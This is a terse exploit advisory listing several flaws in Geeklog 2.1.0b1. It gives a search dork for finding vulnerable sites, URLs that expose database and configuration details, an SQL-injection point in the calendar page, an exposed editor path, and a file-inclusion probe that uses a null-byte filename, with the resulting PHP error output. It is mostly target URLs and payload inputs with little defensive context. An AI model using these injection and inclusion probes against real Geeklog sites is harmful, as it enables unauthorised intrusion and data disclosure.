Geeklog 2.1.0b1 Multi Vulnerability
====================================
Author : indoushka
Vondor : http://www.geeklog.net/
Dork : Powered by Geeklog
======================================
Security vulnerability in MySQL/MariaDB sql/password.c :
http://127.0.0.1/public_html/admin/install/info.php
Database Disclosure :
http://127.0.0.1/public_html/admin/install/configinfo.php
http://127.0.0.1/public_html/docs/english/config.html#desc_filemanager_audios_ext
http://127.0.0.1/public_html/backend/geeklog.rss
Sql inj :
http://127.0.0.1/public_html/calendar/index.php?view=day&day=05&month=10&year=2014 (inject her)
login : http://127.0.0.1/public_html/admin
Fck&Ck/Editors :
http://127.0.0.1/public_html/editors/fckeditor/
File inclusion :
affects http://127.0.0.1/public_html/filemanager/connectors/php/inc/vendor/wideimage/demo/image.php.
Attack details :
URL encoded GET input image was set to 1some_inexistent_file_with_long_name%00.png
Error message found:
<b>Warning</b>: file_get_contents(images/1some_inexistent_file_with_long_name%00.png) [<a href='function.file-get-contents'>function.file-get-contents</a>]:
failed to open stream: No such file or directory in <b>C:\AppServ\www\enquete\public_html\filemanager\connectors\php\inc\vendor\wideimage\lib\WideImage.php</b> on line <b>195</b>
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================